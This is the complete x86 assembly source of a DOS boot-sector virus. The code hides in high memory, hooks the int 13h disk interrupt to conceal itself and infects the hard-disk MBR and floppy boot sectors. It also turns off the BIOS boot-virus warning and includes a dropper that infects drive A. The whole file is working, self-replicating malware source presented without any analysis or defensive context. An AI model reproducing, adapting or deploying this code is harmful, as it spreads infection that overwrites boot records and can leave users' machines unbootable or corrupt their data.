.286 ; Virus Size~=350 bytes VirLenght equ offset @@EndOfVir - offset begin BuffOfs equ 512 ; Block for MBR text segment byte public assume cs:text,ds:text org 100h begin: jmp @@Install ; Will be push cs dw 07bfeh ; ... pop ss, mov sp,7bfeh - 1+1+3 = 5 bytes call GetOfs ; Get Current Offset in si GetOfs: pop si ; si = offset 'pop si' - 1 byte sub si,3+2+3 ; si = "offset" begin push cs ; 1 byte pop ds ; ds = 0000h cld ; Move Strings Forward dec word ptr ds:[0413h] mov ax,word ptr ds:[0413h] shl ax,6 ; Decrease DOS memory by 1 Kbyte(1024 Bytes) mov es,ax ; es = segment of "hidden" memory mov cx,VirLenght ; Total Viral Code in bytes xor di,di ; Move to es:0000h push es ; All ItSelf Code push offset @@StartVir - 100h rep movsb ; 2 bytes retf ; go to es:@@StartVir - 1 byte @@StartVir: push ds ; Load Nature MBR pop es ; es = 0000h mov ax,0201h ; Sectors = 1 mov bx,07c00h ; Standart Place for BOOT/MBR mov cx,cs:[di-3] ; Road, Sect mov dx,cs:[di-5] ; Head, Diskovod push ax ; Save ax int 13h ; write to 0000:07c00 pop ax ; ax = 0201h push es ; Be ready to return push bx ; Push far Ret Address 0000:7c00 ; Infect Hard Drive mov si,0040h*16+00b6h ; Virus Warning on Boot push word ptr ds:[si] and byte ptr ds:[si],255-128 push cs ; ds = to new Data Allocation pop ds push cs pop es ; es=cs mov cx,0001h ; Road=0, Sect=1 mov dx,0080h ; Head,Diskovod=80h mov bx,BuffOfs int 13h ; es:[bx] - point to Buffer jc @@ErrMBR ; Disk Not Reading cmp byte ptr [bx],0eh ; Already Infected ? jz @@ErrMBR ; Yes ! mov cl,0ch ; Use 12 Sector mov ax,0301h ; Write Function int 13h jc @@ErrMBR ; Disk Not Reading mov di,bx ; Our Code call @@CopyBoot ; Viral Code to ... Replace to old MBR int 13h ; ax=0301h, cx=0001h @@ErrMBR: push ss pop es ; es=0000h pop word ptr es:[si] ; Virus Warning on Boot mov byte ptr ds:[si-1],0 mov di,13h*4 ; Hook int 13h mov ax,offset @@New13Handler - 100h xchg ax,word ptr es:[di] mov word ptr Old13h-100h,ax mov ax,cs xchg ax,word ptr es:[di+2] mov word ptr Old13h-100h+2,ax ; To Nature Boot/MBR Record retf @@New13Handler: ; New int 13h handler push si mov si,offset Old13h-100h push ds push cs pop ds mov ds:[si+8],ah ; Save ah cmp ah,02h jz @@Stells cmp ah,03h jnz @@SkipStells @@Stells: cmp cx,0001h jnz @@SkipStells test dh,dh jnz @@SkipStells cmp dl,[si+4] ; Read Start Device ? jnz @@SkipStells push cx push dx mov dx,ds:[si+4] mov cx,ds:[si+6] pushf call dword ptr ds:[si] ; Execute It ! pop dx pop cx jmp short @@AfterStells @@SkipStells: pushf call dword ptr ds:[si] ; Execute It ! @@AfterStells: jc @@DiskError pushf pusha push es ; Check for BOOT Signature... cmp word ptr es:[bx+01feh],0aa55h jnz @@NoBootRec cmp byte ptr es:[bx],0ebh jnz @@NoBootRec ; Real BOOT Record ?! mov ah,02h ; Try to Infect !!! mov ds:[si+8],ah ; It works under Windows too ))) mov cx,0001 xor dx,dx @@NoBootRec: test dl,dl ; Drive A ? jnz @@Usal13h mov ax,0201h ; ax=0201h, 1 Sector cmp ds:[si+8],ah ; It was reading ? jnz @@Usal13h xor dh,dh ; Head=0 dec cx ; Road=0, Sec=1 (cx=01h) ? jnz @@Usal13h inc cx ; cx=0001h mov bx,BuffOfs ; Reading That We Need ! push ds pop es pushf call dword ptr ds:[si] ; Execute It ! jc @@Usal13h ; Error ! lea di,[bx+0055h] cmp byte ptr [di],0eh ; Already Infected ? jz @@Usal13h ; Yes ! mov ch,79 ; Default Road mov al,[bx+15h] cmp al,0f0h jz @@Real80 cmp al,0f9h jz @@Real80 cmp al,0fh jnz @@Usal13h mov ch,39 @@Real80: inc dh ; dx=0100h mov cl,[bx+18h] ; Max Sector mov ax,0301h ; Write function pushf call dword ptr ds:[si] ; Execute It ! jc @@Usal13h mov word ptr [bx],053ebh call @@CopyBoot xor dx,dx ; cx=0001h pushf call dword ptr ds:[si] ; Execute It ! @@Usal13h: pop es popa popf @@DiskError: pop ds pop si retf 2 @@CopyBoot: ; Move all Viral Code to es:[di] pusha ; For disk int 13h operations cld mov cx,VirLenght xor si,si rep movsb popa ; ... and put onto this new Road..Disk mov CylSec[di-100h],cx ; Road, Sect mov NumHead[di-100h],dx ; Head, Diskovod mov ax,0301h ; After return we'll use mov cx,0001h ; these values ret Old13h: dw ? ; [si] dw ? ; [si+2] NumHead dw ? ; [si+4] CylSec dw ? ; [si+6] Save_ah db ? ; [si+8] @@EndOfVir: @@Install: mov ax,0201h ; Sectors = 1 mov cx,01h ; Road =0, Sect = 1 xor dx,dx ; Head = 0, Diskovod = 0 mov bx,offset DiskBuffer int 13h ; es:[bx] - point to Buffer jc @@Error ; Disk Not Reading push es push bx mov ah,08h xor dl,dl int 13h pop bx pop es jc @@Error xor dl,dl mov NumHead,dx mov CylSec,cx mov ax,0301h int 13h jc @@Error cld mov si,offset begin mov word ptr [si],0170eh mov byte ptr [si+2],0bch mov word ptr DiskBuffer,053ebh mov di,offset DiskBuffer + 0055h mov cx,VirLenght rep movsb mov ax,0301h mov cx,01h xor dx,dx int 13h jc @@Error @@Exit: mov ax,4C00h int 21H ; BACK TO DOS ! - Only Once ! @@Error: mov dx,offset ErrMess mov ah,09h int 21h jmp short @@Exit Done: ErrMess db 'Error !','$' DiskBuffer db 512 dup(?) Text Ends end begin